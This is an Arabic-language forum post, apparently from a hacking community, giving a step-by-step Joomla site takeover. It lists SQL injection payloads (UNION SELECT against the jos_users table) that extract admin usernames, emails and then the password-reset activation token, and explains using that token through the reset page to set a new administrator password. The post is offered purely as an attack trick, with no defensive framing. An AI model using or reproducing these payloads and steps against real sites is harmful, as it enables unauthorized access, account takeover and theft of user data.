حقن و اختراق جوملة بدون الحاجة لفك الهاش --

السلام عليكم و رحمة الله تعالى و بركاته

طبعا الكل يعرف أنو معضم ثغرات الجوملة على مواقع الحماية سيكول
لكن تقريبا الكل يقف عند استخراج الهاش لأنو قليلا ما يمكن فكه
في هاذا الموضوع حبيت أطرح حيلة صغيرة تساعد على دعس الهدف


كود PHP:


+union+select+1,concat_ws(username,0x3a,password),3+from+jos_users--






طبعا هاذي الحقنة عادي كما يعرفها الكل
و طلبنا فيها اليوزر و الباس
--
خلونا نطلب الإيميل بدل الباس

كود PHP:


+union+select+1,concat_ws(username,0x3a,email),3+from+jos_users--






لحد الآن كل شيئ بسيط
-
-
الخطوة اللي بعدها أنا نروح نقول لسكربت الجوملة أننا نسينا الباس
عبر هاذا الرابط

كود PHP:


/index.php?option=com_user&view=reset






نحط بيانات المدير و نضغط ok

رح يتم ارسال كود أكتفيشن ( activation ) لإيميل المدير

و رح يطلب منا السكربت الكود هاذا كي نستطيع إعادة وضع الباس

و هنا اللعبة
الكود هاذا ينزل على قاعدة البيانات أيضا .. يعني رح نجيبه بالحقن

فقط هكذا

كود PHP:


+union+select+1,concat_ws(email,0x3a,username,0x3a,activation),3+from+jos_users--






الآن كود الأكتفيشن عندك
روح اللوحة اللي وقفنا عندها بعد وضع بيانات المدير

و أعطيه كود الأكتفيشن
رح يقلك أعطيني الباس الجديد
حط باس من عندك ... و اسم المدير عندنا

مبروك عليك الموقع

دمتم في رعاية الله